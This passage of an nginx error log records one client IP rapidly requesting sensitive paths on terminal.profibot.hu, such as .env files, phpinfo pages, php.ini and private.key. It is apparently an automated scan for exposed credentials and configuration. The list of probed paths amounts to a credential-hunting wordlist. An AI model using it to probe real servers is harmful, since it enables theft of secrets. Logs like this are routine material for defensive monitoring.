"terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /magento/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mailinabox/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mailman/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main-es2015.3c3aa123423ff18c0b00.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main-es2018.96dcf91e05121e327dcb.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main-TDTOTK7F.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main-WTCAS2AO.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main.0ad61943313a734cc3ac.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main.2b8841d1a101dd041285.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main.35a08c25eb91de70487f.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main.457ddfd2b1341056.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main.48f1bbcf6201c5ea.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main.58a95e8d8659972f.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main.702787bb88cacd05b11d.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main.b610bd7c7b9b7a47.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /main_user/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Makefile HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /manifest.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /manual/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /master/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /media/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /memcached/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mentorg-lava-docker/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /micro-app-react-communication/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /micro-app-react/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mindsweeper/gui/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /minified/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /misc/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Modix/ClientApp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /monerod/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mongodb/config/dev/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /monitoring/compose/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /moodledata/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /msks/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /munki_repo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /music/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /MyRentals.Web/ClientApp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mysql/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /name/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:59 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /nest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /netlify.toml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /new-js/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /new.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /news-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /next/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /nginx-server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /niffler-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /node_modules/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Nodejs-Projects/play-ground/login/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Nodejs-Projects/play-ground/ManageUserRoles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /noVNC/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /now.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Nuke.App.Ui/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /nuxt/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /o.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ocp.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /of.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /old/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /old/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /old_phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /old_site/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /oldsanta/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /opencart/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ops/vagrant/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /option/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /orientdb-client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /outputs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /owncloud/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /p.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/styled-ui-docs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packages/web/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /packed/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /page-editor/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /panel/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /parity/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Passportjs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /patchwork/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /path/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:00 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /pfbe/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /php.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /php.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /php1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /php52/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /php_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpcustom_info/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.php4 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.php5 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo3.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo4.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfodev.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfos.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpMyAdmin/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpmyadmin/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpsysinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpsysinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpsysinfo/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpsysinfo/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpsysinfo/phpsysinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phptest.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpversion.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /pi.php5 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /pictures/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /platform/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /playground/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /plugin_static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /plugins/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /post-deployment/.vscode/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /postfixadmin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /prestashop/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /preview-env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:01 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /preview/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /price_hawk_client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /prisma/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /private.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /processor/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Procfile HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /prod/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /product/.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /projbackend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /project/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /project_root/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /protected/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /psnlink/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /pt2/countries/src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /pt8/library-backend-gql/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /pub/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /public/system HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /public_html/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /public_root/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /q.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /qq.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /question2/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:02 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 